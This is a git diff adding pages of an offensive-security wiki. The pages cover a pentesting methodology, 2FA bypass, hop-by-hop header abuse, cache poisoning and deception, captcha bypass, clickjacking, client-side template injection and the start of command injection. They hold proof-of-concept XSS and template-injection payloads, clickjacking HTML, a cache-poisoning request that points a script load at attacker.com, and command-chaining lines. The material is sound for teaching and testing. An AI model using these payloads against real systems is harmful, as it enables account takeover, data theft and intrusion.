+However, if you **pass the check** and your sessions is granted that "True" value in the security attribute, you can try to **access other resources** that **depends on the same attribute** but that you **shouldn't have permissions** to access. [WriteUp](https://medium.com/@ozguralp/a-less-known-attack-vector-second-order-idor-attacks-14468009781a).
+
+### Register functionality
+
+Try to register as an already existent user. Try also using equivalent characters \(dots, lots of spaces and Unicode\).
+
+### Takeover emails
+
+Register an email, before confirming it change the email, then, if the new confirmation email is sent to the first registered email,you can takeover any email. Or if you can enable the second email confirming the firt one, you can also takeover any account.
+
+### Access Internal servicedesk of companies using atlassian
+
+{% embed url="https://yourcompanyname.atlassian.net/servicedesk/customer/user/login" %}
+
+
+
diff --git a/pentesting-methodology.md b/pentesting-methodology.md
new file mode 100644
index 00000000..6d9860ad
--- /dev/null
+++ b/pentesting-methodology.md
@@ -0,0 +1,129 @@
+---
+description: >-
+  This is the main page. Here you can find the typical workflow for the
+  pentesting of a machine
+---
+
+# Pentesting Methodology
+
+![](.gitbook/assets/portada-2.png)
+
+If you want to **know** about my **latest modifications**/**additions or you have any suggestion for HackTricks or PEASS**, **join the** [**PEASS & HackTricks telegram group here**](https://t.me/peass)**.**
+
+## 0- Physical Attacks
+
+Do you have **physical access** to the machine that you want to attack? You should read some ****[**tricks about physical attacks**](physical-attacks/physical-attacks.md) and others about [**escaping from GUI applications**](physical-attacks/escaping-from-gui-applications/).
+
+## 1- [Discovering hosts inside the network ](pentesting/pentesting-network/#discovering-hosts)
+
+## **2-** [**Having Fun with the network**](pentesting/pentesting-network/)
+
+Before attacking a host maybe you prefer to **steal some credentials** **from the network** or **sniff** some **data** to learn **passively/actively\(MitM\)** what can you find inside the network. You can read [**Pentesting Network**](pentesting/pentesting-network/#sniffing).
+
+## 3- [Port Scan - Service discovery](pentesting/pentesting-network/#scanning-hosts)
+
+The first thing to do when **looking for vulnerabilities in a host** is to know which **services are running** in which ports. Let's see the[ **basic tools to scan ports of hosts**](pentesting/pentesting-network/#scanning-hosts).
+
+## **4-** [Searching service version exploits](search-exploits.md)
+
+Once you know which services are running, and maybe their version, you have to **search for known vulnerabilities**. Maybe you get lucky and there is a exploit to give you a shell...
+
+## **5-** Pentesting Services
+
+If there isn't any fancy exploit for any running service, you should look for **common misconfigurations in each service running.**
+
+**Inside this book you will find a guide to pentest the most common services** \(and others that aren't so common\)**. Please, search in the left index the** _**PENTESTING**_ **section** \(the services are ordered by their default ports\).
+
+**I want to make a special mention of the** [**Pentesting Web**](pentesting/pentesting-web/) **part \(as it is the most extensive one\).**  
+Also, a small guide on how to[ **find known vulnerabilities in software**](search-exploits.md) can be found here.
+
+**If your service is not inside the index, search in Google** for other tutorials and **let me know if you want me to add it.** If you **can't find anything** in Google, perform your **own blind pentesting**, you could start by **connecting to the service, fuzzing it and reading the responses** \(if any\).
+
+### 5.1 Automatic Tools
+
+There are also several tools that can perform **automatic vulnerabilities assessments**. **I would recommend you to try** [**Legion**](https://github.com/carlospolop/legion)**, which is the tool that I have created and it's based on the notes about pentesting services that you can find in this book.**
+
+### **5.2 Brute-Forcing services**
+
+In some scenarios a **Brute-Force** could be useful to **compromise** a **service**. [**Find here a CheatSheet of different services brute forcing**](brute-force.md)**.**
+
+## **6-** [**Getting Shell**](shells/shells/)\*\*\*\*
+
+Somehow you should have found **some way to execute code** in the victim. Then, [a list of possible tools inside the system that you can use to get a reverse shell would be very useful](shells/shells/).
+
+Specially in Windows you could need some help to **avoid antiviruses**: ****[**Check this page**](windows/av-bypass.md)**.**
+
+## 7- Inside
+
+If you have troubles with the shell, you can find here a small **compilation of the most useful commands** for pentesters:
+
+* [**Linux**](linux-unix/useful-linux-commands/)\*\*\*\*
+* \*\*\*\*[**Windows \(CMD\)**](windows/basic-cmd-for-pentesters.md)\*\*\*\*
+* \*\*\*\*[**Winodows \(PS\)**](windows/basic-powershell-for-pentesters/)\*\*\*\*
+
+## **8 -** [**Exfiltration**](exfiltration.md)\*\*\*\*
+
+You will probably need to **extract some data from the victim** or even **introduce something** \(like privilege escalation scripts\). **Here you have a** [**post about common tools that you can use with these purposes**](exfiltration.md)**.**
+
+## **9- Privilege Escalation**
+
+### **9.1- Local Privesc**
+
+If you are **not root/Administrator** inside the box, you should find a way to **escalate privileges.**  
+Here you can find a **guide to escalate privileges locally in** [**Linux**](linux-unix/privilege-escalation/) **and in** [**Windows**](windows/windows-local-privilege-escalation/)**.**  
+You should also check this pages about how does **Windows work**:
+
+* [**Authentication, Credentials, Token privileges and UAC**](windows/credentials.md)\*\*\*\*
+* How does [**NTLM works**](windows/ntlm/)\*\*\*\*
+* How to [**steal credentials**](windows/stealing-credentials/) in Windows
+* Some tricks about [_**Active Directory**_](windows/active-directory-methodology/)_\*\*\*\*_
+
+**Don't forget to checkout the best tools to enumerate Windows and Linux local Privilege Escalation paths:** [**Suite PEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)
+
+### **9.2- Domain Privesc**
+
+Here you can find a [**methodology explaining the most common actions to enumerate, escalate privileges and persist on an Active Directory**](windows/active-directory-methodology/). Even if this is just a subsection of a section, this process could be **extremely delicate** on a Pentesting/Red Team assignment.
+
+## 10 - POST
+
+### **10**.1 - Looting
+
+Check if you can find more **passwords** inside the host or if you have **access to other machines** with the **privileges** of your **user**.  
+Find here different ways to [**dump passwords in Windows**](windows/stealing-credentials/).
+
+### 10.2 - Persistence
+
+**Use 2 o 3 different types of persistence mechanism so you won't need to exploit the system again.  
+Here you can find some** [**persistence tricks on active directory**](windows/active-directory-methodology/#persistence)**.**
+
+TODO: Complete persistence Post in Wnidows & Linux
+
+## 11 - Pivoting
+
+With the **gathered credentials** you could have access to other machines, or maybe you need to **discover and scan new hosts** \(start the Pentesting Methodology again\) inside new networks where your victim is connected.  
+In this case tunnelling could be necessary. Here you can find [**a post talking about tunnelling**](tunneling-and-port-forwarding.md).  
+You definitely should also check the post about [Active Directory pentesting Methodology](windows/active-directory-methodology/). There you will find cool tricks to move laterally, escalate privileges and dump credentials.   
+Check also the page about [**NTLM**](windows/ntlm/), it could be very useful to pivot on Windows environments..
+
+## MORE
+
+### [Android Applications](mobile-apps-pentesting/android-app-pentesting/)
+
+### **Exploiting**
+
+* \*\*\*\*[**Basic Linux Exploitnig**](exploiting/linux-exploiting-basic-esp/)\*\*\*\*
+* \*\*\*\*[**Basic Windows Exploiting**](exploiting/windows-exploiting-basic-guide-oscp-lvl.md)\*\*\*\*
+* \*\*\*\*[**Basic exploiting tools**](exploiting/tools/)\*\*\*\*
+
+### \*\*\*\*[**Basic Python**](misc/basic-python/)\*\*\*\*
+
+### **Crypto tricks**
+
+* \*\*\*\*[**ECB**](crypto/electronic-code-book-ecb.md)\*\*\*\*
+* \*\*\*\*[**CBC-MAC**](crypto/cipher-block-chaining-cbc-mac-priv.md)\*\*\*\*
+* \*\*\*\*[**Padding Oracle**](crypto/padding-oracle-priv.md)\*\*\*\*
+
+![](.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%281%29.png)
+
+​[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*
+
diff --git a/pentesting-web/2fa-bypass.md b/pentesting-web/2fa-bypass.md
new file mode 100644
index 00000000..5fb07cfb
--- /dev/null
+++ b/pentesting-web/2fa-bypass.md
@@ -0,0 +1,105 @@
+# 2FA Bypass
+
+## **Bypassing two-factor authentication**
+
+### **Direct bypass**
+
+Fuck the 2FA, just **try to access the next endpoint directly** \(you need to know the path of the next endpoint\). If this doesn't work, try to change the **Referrer header** as if you came from the 2FA page.
+
+### **Reusing token**
+
+Maybe you can reuse an already used token inside the account to authenticate.
+
+### Sharing unused tokens
+
+Check if you can get for your account a token and try to use it to bypass the 2FA in a different account.
+
+### Leaked Token
+
+Is the token leaked on a response from the web application?
+
+### Session permission
+
+Using the same session start the flow using your account and the victims account. When reaching the 2FA point with both account, complete the 2FA with your account but do not access the next part. Instead of that, try to access to the next step with the victims account floe. If the back-end only set a boolean inside your sessions saying that you have successfully passed the 2FA you will be able to bypass the 2FA of the victim.
+
+### **Password reset function**
+
+In almost all web applications the **password reset function automatically logs the user into the application** after the reset procedure is completed.  
+Check if a **mail** is sent with a **link** to **reset the password** and if you can **reuse** that **link** to reset the password as **many times as you want** \(even if the victim changes his email address\).
+
+### OAuth
+
+If you can compromise the account of the user in a trusted **OAuth** platform\(Google, Facebook...\)
+
+### Brute force
+
+#### Lack of Rate limit
+
+There is any limit in the amount of codes that you can try, so you can just brute force it. Be careful with a possible "silent" rate-limit, always try several codes and then the real one to confirm the vulnerability.
+
+#### Flow rate limit but no rate limit
+
+In this case there is a flow rate limit \(you have to brute force it very slowly: 1 thread and some sleep before 2 tries\) but no rate limit. So with enough time you can be able to find the valid code.
+
+#### Re-send code reset the limit
+
+There is a rate limit but when you "resend the code" the same code is sent and the rate limit is reset. Then, you can brute force the code while you resend it so the rate limit is never reached.
+
+#### Client side rate limit bypass
+
+[Read this post.](rate-limit-bypass.md)
+
+#### Lack of rate limit in user's account
+
+Sometimes you can configure the 2FA for some actions inside your account \(change mail, password...\). However, even in cases where there was a rate limit when you tried to log in, there isn't any rate limit protecting this actions.
+
+#### Lack of rate limit re-sending the code via SMS
+
+You want be able to bypass the 2FA but you will be able to waste money of the company.
+
+### CSRF/Clickjacking
+
+Check if there is a CSRF or a Clickjacking vulnerability to disable the 2FA. 
+
+### Remember me functionality
+
+#### Guessable cookie
+
+If the remember me functionality uses a new cookie with a guessable code, try to guess it.
+
+#### IP address
+
+If the "remember me" functionality is attached to your IP address, you can try to figure out the IP address of the victim and impersonate it using the **X-Forwarded-For** header.
+
+### Older versions
+
+#### Subdomains
+
+If you can find some "testing" subdomains with the login functionality, they could be using old versions that don't support 2FA \(so it is directly bypassed\) or those endpoints could support a vulnerable version of the 2FA.
+
+#### Apis
+
+If you find that the 2FA is using an API located under a /v\*/ directory \(like "/v3/"\), this probably means that there are older API endpoints that could be vulnerable to some kind of 2FA bypass.
+
+### Previous sessions
+
+When the 2FA is enabled, previous sessions created should be ended.This is because when a client has his account compromised he could want to protect it activating the 2FA, but if the previous sessions aren't ended, this won't protect him.
+
+### Improper access control to backup codes
+
+Backup codes are being generated immediately after 2FA is enabled and are available on a single request. After each subsequent call to the request, the codes can be regenerated or remain unchanged \(static codes\). If there are CORS misconfigurations/XSS vulnerabilities and other bugs that allow you to “pull” backup codes from the response’ request of the backup code endpoint, then the attacker could steal the codes and bypass 2FA if the username and password are known.
+
+### Information Disclosure
+
+If in the 2FA page appears some confidential information that you didn't know previously \(like the phone number\) this can be considered an information disclosure vulnerability.
+
+## References
+
+{% embed url="https://medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35" %}
+
+
+
+
+
+
+
diff --git a/pentesting-web/abusing-hop-by-hop-headers.md b/pentesting-web/abusing-hop-by-hop-headers.md
new file mode 100644
index 00000000..c42cdb8d
--- /dev/null
+++ b/pentesting-web/abusing-hop-by-hop-headers.md
@@ -0,0 +1,53 @@
+# Abusing hop-by-hop headers
+
+Most of the content of this post was extracted from [https://nathandavison.com/blog/abusing-http-hop-by-hop-request-headers](https://nathandavison.com/blog/abusing-http-hop-by-hop-request-headers) \(come copy/pasted and some redacted by me\)
+
+## What is a hop-by-hop header?
+
+A hop-by-hop header is a header which is designed to be processed and consumed by the proxy currently handling the request, as opposed to an end-to-end header.
+
+According to [RFC 2612](https://tools.ietf.org/html/rfc2616#section-13.5.1), the HTTP/1.1 spec treats the following headers as hop-by-hop by default: `Keep-Alive`, `Transfer-Encoding`, `TE`, `Connection`, `Trailer`, `Upgrade`, `Proxy-Authorization` and `Proxy-Authenticate`. When encountering these headers in a request, a compliant proxy should process or action whatever it is these headers are indicating, and not forward them on to the next hop.
+
+Further to these defaults, a request [may also define a custom set of headers to be treated as hop-by-hop](https://tools.ietf.org/html/rfc2616#section-14.10) by adding them to the `Connection` header, like so:
+
+```text
+Connection: close, X-Foo, X-Bar
+```
+
+## The theory on abusing hop-by-hop headers
+
+In theory, proxies should remove hop-by-hop headers received before sending them to the next address. But you can find in the wild that this is done by some proxies and others just send all the headers adding its own `Connection`header.
+
+![](../.gitbook/assets/image%20%2897%29.png)
+
+## Testing hop-by-hop deletions
+
+If you find a header that makes the response of the server changes if it is set of if it is not, then you can search for hop-by-hop deletions. For example, the cookie header will make the response of the server to be dramatically different if it is set \(with a valid content\) and if it is not.
+
+So, send a request with a valid header and with this value of the Connection header `Connection: close, Cookie` if the response is the same as if the cookie wasn't sent, then there is a proxy removing headers.
+
+You can find if the response of the server is any different if a header is deleted using this technique using[ this script](https://gist.github.com/ndavison/298d11b3a77b97c908d63a345d3c624d). Then, if you pass in a list of known headers, such as [this one](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/BurpSuite-ParamMiner/lowercase-headers), you can observe which headers are causing effects despite not being in your original request:
+
+```text
+for HEADER in $(cat headers.txt); do python poison-test.py -u "https://target" -x "$HEADER"; sleep 1; done
+```
+
+This will cycle through the entire header list and print out if its presence in the hop-by-hop list created a different status code or response body size.
+
+## Abusing X-Forwarded-For
+
+In general, proxies will add the IPs of the clients inside the `X-Forwarded-For` header so the next hop will know where does the petition comes from. However, if an attacker sends a Connection value like `Connection: close, X-Forwarded-For` and the first proxy sends the hop-by-hop headers with their values \(it sends the special Connection value\), then the second value may delete the X-Forward-For header.  
+At the end, the final App won't know who sent the request and may think that it was the last proxy, and is this scenario an attacker may be able to access resources protected by IP whitelisting \(maybe some `/admin` ?\).
+
+Depending on the system being targeted, you may also have `Forwarded`, `X-Real-IP`, and a bunch of others that are less common.
+
+## Detecting Proxies and fingerprinting services
+
+This technique may be useful to detect proxies \(using the cookie technique\) or even to detect services. For example, if you abuse this technique to delete the header `X-BLUECOAT-VIA` and an error is thrown, then you have find that Bluecoat was being used.
+
+## Other Attacks
+
+* For a possible DoS Cache poisoning abusing this technique read the original link
+* This could be useful in attacks that may allow you to insert new headers \(low probability\)
+* Also,it could be useful to bypass defensive functionalities. For example, if the lack of a header means that a request shouldn't be processed by a WAF, you could bypass a WAF with this technique.
+
diff --git a/pentesting-web/cache-deception.md b/pentesting-web/cache-deception.md
new file mode 100644
index 00000000..09fef143
--- /dev/null
+++ b/pentesting-web/cache-deception.md
@@ -0,0 +1,109 @@
+# Cache Poisoning and Cache Deception
+
+## The difference
+
+> **What is the difference between web cache poisoning and web cache deception?**
+>
+> * In **web cache poisoning**, the attacker causes the application to store some malicious content in the cache, and this content is served from the cache to other application users.
+> * In **web cache deception**, the attacker causes the application to store some sensitive content belonging to another user in the cache, and the attacker then retrieves this content from the cache.
+
+## Cache Poisoning
+
+The goal of poisoning the cache is to make the clients load unexpected resources partially or totally controlled by the attacker.  
+The poisoned response will only be served to users who visit the affected page while the cache is poisoned. As a result, the impact can range from non-existent to massive depending on whether the page is popular or not.
+
+In order to perform a cache poisoning attack you need first to **identify ukeyed inputs** \(parameters not needed to appear on the the cached request but that change the returned page\), see **how to abuse** this parameter and **get the response cached**. 
+
+### Identify and evaluate unkeyed inputs
+
+You could use  [Param Miner](https://portswigger.net/bappstore/17d2949a985c4b7ca092728dba871943) to **brute-force parameters and headers** that may be **changing the response of the page**. For example, a page may be using the header `X-Forwarded-For` to indicate the client to load script from there: 
+
+```markup
+<script type="text/javascript" src="//<X-Forwarded-For_value>/resources/js/tracking.js"></script>
+```
+
+### Elicit a harmful response from the back-end server
+
+With the parameter/header identified check how it is being **sanitised** and **where** is it **getting reflected** or affecting the response from the header. Can you abuse it any any way \(perform a XSS or load a JS code controlled by you? perform a DoS?...\)
+
+### Get the response cached
+
+Once you have **identified** the **page** that can be abused, which **parameter**/**header** to use and **how** to **abuse** it you need to get the page cached. Depending on the resource you are trying to get in the cache this could time more or less time and some times you just will need to be trying several seconds.  
+The header **`X-Cache`** in the response could be very useful as it may have the value **`miss`** when the request wasn't cached and the value **`hit`** when it is cached.  
+The header **`Cache-Control`** is also interesting to know if a resource is being cached and when will be the next time the resource will be cached again: `Cache-Control: public, max-age=1800`  
+Another interesting header is **`Vary`** . This header is often used to **indicate additional headers** that are treated as **part of the cache key** even if they are normally unkeyed. Therefore, if the user knows the `User-Agent` of the victim he is targeting, he can poison the cache for the users using that specific `User-Agent`.  
+One more header related to the cache is **`Age`**. It defines the times in seconds the object has been in the proxy cache.
+
+When caching a request, be **careful with the headers you use** because some of them could be **used unexpectedly** as **keyed** and the **victim will need to use that same header**. Always **test** a Cache Poisoning with **different browsers** to check if it's working. 
+
+## Examples
+
+### Easiest example
+
+A header like `X-Forwarded-For` is being reflected in the response unsanitized&gt;  
+You can send a basic XSS payload and poison the cache so everybody that access page will be XSSed:
+
+```markup
+GET /en?region=uk HTTP/1.1
+Host: innocent-website.com
+X-Forwarded-Host: a."><script>alert(1)</script>"
+```
+
+_Note that this will poison a request to `/en?region=uk` not to `/en`_
+
+### Using web cache poisoning to exploit cookie-handling vulnerabilities
+
+Cookies could also be reflected on the response of a page. If you can abuse it to cause a XSS for example, you could be able to exploit XSS in several clients that load the malicious cache response.
+
+```markup
+GET / HTTP/1.1
+Host: vulnerable.com
+Cookie: session=VftzO7ZtiBj5zNLRAuFpXpSQLjS4lBmU; fehost=asd"%2balert(1)%2b"
+```
+
+Note that if the vulnerable cookie is very used by the users, regular requests will be cleaning the cache.
+
+### Using multiple headers to exploit web cache poisoning vulnerabilities <a id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
+
+Some time you will need to **exploit several ukneyed inputs** to be able to abuse a cache. For example, you may find an **Open redirect** if you set `X-Forwarded-Host` to a domain controlled by you and `X-Forwarded-Scheme` to `http`.**If** the **server** is **forwarding** all the **HTTP** requests **to HTTPS** and using the header `X-Forwarded-Scheme` as domain name for the redirect. You can control where the pagepointed by the redirect.
+
+```markup
+GET /resources/js/tracking.js HTTP/1.1
+Host: acc11fe01f16f89c80556c2b0056002e.web-security-academy.net
+X-Forwarded-Host: ac8e1f8f1fb1f8cb80586c1d01d500d3.web-security-academy.net/
+X-Forwarded-Scheme: http
+```
+
+### Exploiting with limited `Vary`header
+
+If you found that the **`X-Host`** header is being used as **domain name to load a JS resource** but the **`Vary`** header in the response is indicating **`User-Agent`** . Then, you need to find a way to ex-filtrate the User-Agent of the victim and poison the cache using that user agent:
+
+```markup
+GET / HTTP/1.1
+Host: vulnerbale.net
+User-Agent: THE SPECIAL USER-AGENT OF THE VICTIM
+X-Host: attacker.com
+```
+
+### Exploiting HTTP Cache Poisoning abusing HTTP Request Smuggling
+
+Learn here about how to perform [Cache Poisoning attacks abusing HTTP Request Smuggling](http-request-smuggling.md#using-http-request-smuggling-to-perform-web-cache-poisoning).
+
+## Cache Deception
+
+The goal of Cache Deception is to make clients load resources that are going to be saved by the cache with their sensitive information.  
+A very clear example can be found in this write-up: [https://hackerone.com/reports/593712](https://hackerone.com/reports/593712).
+
+It=n the example is is explained that if you load a non-existent page like  _http://www.example.com/home.php/non-existent.css_ the content of _http://www.example.com/home.php_ \(**with the users sensitive information**\) is going to be returned and the cache server is going to save the result.  
+Then, the **attacker** can access _http://www.example.com/home.php_ and see the **confidential information** of the users that accessed before.
+
+Note that the **cache proxy** should be **configured** to **cache** files **based** on the **extension** of the file \(_.css_\) and not base on the content-type. In the example _http://www.example.com/home.php/non-existent.css_ will have a `text/html` content-type instead of a `text/css` mime type \(which is the expected for a _.css_ file\).
+
+Learn here about how to perform[ Cache Deceptions attacks abusing HTTP Request Smuggling](http-request-smuggling.md#using-http-request-smuggling-to-perform-web-cache-deception).
+
+## References
+
+* [https://portswigger.net/web-security/web-cache-poisoning](https://portswigger.net/web-security/web-cache-poisoning)
+* [https://portswigger.net/web-security/web-cache-poisoning/exploiting\#using-web-cache-poisoning-to-exploit-cookie-handling-vulnerabilities](https://portswigger.net/web-security/web-cache-poisoning/exploiting#using-web-cache-poisoning-to-exploit-cookie-handling-vulnerabilities)
+* [https://hackerone.com/reports/593712](https://hackerone.com/reports/593712)
+
diff --git a/pentesting-web/captcha-bypass.md b/pentesting-web/captcha-bypass.md
new file mode 100644
index 00000000..0a031ea5
--- /dev/null
+++ b/pentesting-web/captcha-bypass.md
@@ -0,0 +1,15 @@
+# Captcha Bypass
+
+## Captcha Bypass
+
+To **automate** the **testing** of some functions of the server that allows user input it **could** be **needed** to **bypass** a **captcha** implementation. Test these things:
+
+* **Do not send the parameter** related to the captcha.
+* Send the **captcha parameter empty**.
+* Check if the value of the captcha is **in the source code** of the page.
+* Check if the value is **inside a cookie.**
+* Check if you can use the **same** captcha **value** several times with **the same or different sessionID.**
+* If the captcha consists on a **mathematical operation** try to **automate** the **calculation.**
+* If the captcha consists on **read characters from an image**, check manually or with code **how many images** are being used and if only a **few images are being used, detect them by MD5.**
+* Use an **OCR** \([https://github.com/tesseract-ocr/tesseract](https://github.com/tesseract-ocr/tesseract)\).
+
diff --git a/pentesting-web/clickjacking.md b/pentesting-web/clickjacking.md
new file mode 100644
index 00000000..11018920
--- /dev/null
+++ b/pentesting-web/clickjacking.md
@@ -0,0 +1,124 @@
+# Clickjacking
+
+## What is Clickjacking
+
+Clickjacking is an attack that **tricks** a **user** into **clicking** a webpage **element** which is **invisible** or disguised as another element. This can cause users to unwittingly download malware, visit malicious web pages, provide credentials or sensitive information, transfer money, or purchase products online. \(From [here](https://www.imperva.com/learn/application-security/clickjacking/)\).
+
+### Prepopulate forms trick
+
+Sometimes is possible to fill the value of fields of a form using GET parameters when loading a page. An attacker may abuse this behaviours to fill a form with arbitrary data and send the clickjacking payload so the user press the button Submit.
+
+### Basic Payload
+
+```markup
+<style>
+   iframe {
+       position:relative;
+       width: 500px;
+       height: 700px;
+       opacity: 0.1;
+       z-index: 2;
+   }
+   div {
+       position:absolute;
+       top:470px;
+       left:60px;
+       z-index: 1;
+   }
+</style>
+<div>Click me</div>
+<iframe src="https://vulnerable.com/email?email=asd@asd.asd"></iframe>
+```
+
+### Multistep Payload
+
+```markup
+<style>
+   iframe {
+       position:relative;
+       width: 500px;
+       height: 500px;
+       opacity: 0.1;
+       z-index: 2;
+   }
+   .firstClick, .secondClick {
+       position:absolute;
+       top:330px;
+       left:60px;
+       z-index: 1;
+   }
+   .secondClick {
+       left:210px;
+   }
+</style>
+<div class="firstClick">Click me first</div>
+<div class="secondClick">Click me next</div>
+<iframe src="https://vulnerable.net/account"></iframe>
+```
+
+### XSS + Clickjacking
+
+If you have identified a **XSS attack that requires a user to click** on some element to **trigger** the XSS and the page is **vulnerable to clickjacking**, you could abuse it to trick the user into clicking the button/link.  
+Example:  
+_You found a **self XSS** in some private details of the account \(details that **only you can set and read**\). The page with the **form** to set this details is **vulnerable** to **Clickjacking** and you can **prepopulate** the **form** with GET parameters._  
+An attacker could prepared a **Clickjacking** attack to that page **prepopulating** the **form** with the **XSS payload** and **tricking** the **user** into **Submit** the form. So, **when the form is submited** and the values are modified, the **user will execute the XSS**.
+
+## How to avoid Clickjacking
+
+### Client side defences
+
+It's possible to execute scripts on the client side that perform some or all of the following behaviours to prevent Clickjacking:
+
+* check and enforce that the current application window is the main or top window,
+* make all frames visible,
+* prevent clicking on invisible frames,
+* intercept and flag potential clickjacking attacks to the user.
+
+#### Bypass
+
+As frame busters are JavaScript then the browser's security settings may prevent their operation or indeed the browser might not even support JavaScript. An effective attacker workaround against frame busters is to use the **HTML5 iframe `sandbox` attribute**. When this is set with the `allow-forms` or `allow-scripts` values and the `allow-top-navigation` value is omitted then the frame buster script can be neutralized as the iframe cannot check whether or not it is the top window:
+
+```markup
+<iframe id="victim_website" src="https://victim-website.com" sandbox="allow-forms allow-scripts"></iframe>
+```
+
+Both the `allow-forms` and `allow-scripts` values permit the specified actions within the iframe but top-level navigation is disabled. This inhibits frame busting behaviours while allowing functionality within the targeted site.
+
+Depending on the type of Clickjaking attack performed **you may also need to allow**: `allow-same-origin` and `allow-modals` or [even more](https://www.w3schools.com/tags/att_iframe_sandbox.asp). When preparing the attack just check the console of the browser, it may tell you which other behaviours you need to allow.
+
+### X-Frame-Options
+
+The **`X-Frame-Options` HTTP response header** can be used to indicate whether or not a browser should be **allowed** to render a page in a `<frame>` or `<iframe>`. Sites can use this to avoid Clickjacking attacks, by ensuring that **their content is not embedded into other sites**. Set the **`X-Frame-Options`** header for all responses containing HTML content. The possible values are:
+
+* `X-Frame-Options: deny` which **prevents any domain from framing the content** _\(Recommended value\)_
+* `X-Frame-Options: sameorigin` which only **allows the current site** to frame the content.
+* `X-Frame-Options: allow-from https://trusted.com` which **permits the specified 'uri'** to frame this page.
+  * Check limitations below because **this will fail open if the browser does not support it**.
+  * Other browsers support the new **CSP frame-ancestors directive instead**. A few support both.
+
+### Content Security Policy \(CSP\) frame-ancestors directive
+
+The **recommended clickjacking protection** is to incorporate the **`frame-ancestors` directive** in the application's Content Security Policy.   
+The **`frame-ancestors 'none'`** directive is similar in behaviour to the **X-Frame-Options `deny`** directive \(_No-one can frame the page_\).   
+The **`frame-ancestors 'self'`** directive is broadly equivalent to the **X-Frame-Options `sameorigin`** directive \(_only current site can frame it_\).   
+The **`frame-ancestors trusted.com`** directive is broadly equivalent to the **X-Frame-Options** `allow-from`directive \(_only trusted site can frame it_\).
+
+The following CSP whitelists frames to the same domain only:
+
+`Content-Security-Policy: frame-ancestors 'self';`
+
+See the following documentation for further details and more complex examples:
+
+* [https://w3c.github.io/webappsec-csp/document/\#directive-frame-ancestors](https://w3c.github.io/webappsec-csp/document/#directive-frame-ancestors)
+* [https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/frame-ancestors](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/frame-ancestors)
+
+### Limitations <a id="limitations"></a>
+
+* **Browser support:** CSP frame-ancestors is not supported by all the major browsers yet.
+* **X-Frame-Options takes priority:** [Section "Relation to X-Frame-Options" of the CSP Spec](https://w3c.github.io/webappsec/specs/content-security-policy/#frame-ancestors-and-frame-options) says: "_If a resource is delivered with an policy that includes a directive named frame-ancestors and whose disposition is "enforce", then the X-Frame-Options header MUST be ignored_", but Chrome 40 & Firefox 35 ignore the frame-ancestors directive and follow the X-Frame-Options header instead.
+
+## References
+
+* \*\*\*\*[**https://portswigger.net/web-security/clickjacking**](https://portswigger.net/web-security/clickjacking)\*\*\*\*
+* [**https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking\_Defense\_Cheat\_Sheet.html**](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html)\*\*\*\*
+
diff --git a/pentesting-web/client-side-template-injection-csti.md b/pentesting-web/client-side-template-injection-csti.md
new file mode 100644
index 00000000..f515b136
--- /dev/null
+++ b/pentesting-web/client-side-template-injection-csti.md
@@ -0,0 +1,47 @@
+# Client Side Template Injection \(CSTI\)
+
+## Summary
+
+It is like a [**Server Side Template Injection**](ssti-server-side-template-injection.md) but in the **client**. The **SSTI** can allow you the **execute code** on the remote server, the **CSTI** could allow you to **execute arbitrary JavaScript** code in the victim.
+
+The way to **test** for this vulnerability is very **similar** as in the case of **SSTI**, the interpreter is going to expect something to execute **between doubles keys** and will execute it. For example using something like: `{{ 7-7 }}` if the server is **vulnerable** you will see a `0` and if not you will see the original: `{{ 7-7 }}`
+
+### AngularJS
+
+ AngularJS is a popular JavaScript library, which scans the contents of HTML nodes containing the **`ng-app`** attribute \(also known as an AngularJS directive\). When a directive is added to the HTML code, **you can execute JavaScript expressions within double curly braces**.  
+For example, if your **input** is being **reflected** inside the **body** of the HTML and the body is defined with `ng-app`:  **`<body ng-app>`**
+
+You can **execute arbitrary JavaScript** code using curly braces **adding** to the **body**:  
+
+```javascript
+{{$on.constructor('alert(1)')()}}
+{{constructor.constructor('alert(1)')()}}
+
+<!-- Google Research - AngularJS -->
+<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>
+```
+
+You can find a very **basic online example** of the vulnerability in **AngularJS** in [http://jsfiddle.net/2zs2yv7o/](http://jsfiddle.net/2zs2yv7o/)  
+
+### VueJS
+
+You can find a **vulnerable vue.js** implementation in [https://vue-client-side-template-injection-example.azu.now.sh/](https://vue-client-side-template-injection-example.azu.now.sh/)  
+Working payload: [`https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%`](https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor%28%27alert%28%22foo%22%29%27%29%28%29%7D%7D)
+
+And the **source code** of the vulnerable example here: [https://github.com/azu/vue-client-side-template-injection-example](https://github.com/azu/vue-client-side-template-injection-example)
+
+```markup
+<!-- Google Research - Vue.js-->
+"><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> aaa</div>
+```
+
+### Mavo
+
+Payload: 
+
+```text
+[self.alert(1)]
+```
+
+
+
diff --git a/pentesting-web/command-injection.md b/pentesting-web/command-injection.md
new file mode 100644
index 00000000..1ce2374e
--- /dev/null
+++ b/pentesting-web/command-injection.md
@@ -0,0 +1,48 @@
+# Command Injection
+
+## What is command Injection?
+
+OS command injection \(also known as shell injection\) is a web security vulnerability that allows an attacker to execute arbitrary operating system \(OS\) commands on the server that is running an application, and typically fully compromise the application and all its data. \(From [here](https://portswigger.net/web-security/os-command-injection)\).
+
+### Context
+
+Depending on **where your input is being injected** you may need to **terminate the quoted context** \(using `"` or `'`\) before the commands.
+
+## Command Injection/Execution
+
+```bash
+#Both Unix and Windows supported
+ls||id; ls ||id; ls|| id; ls || id # Execute both
+ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
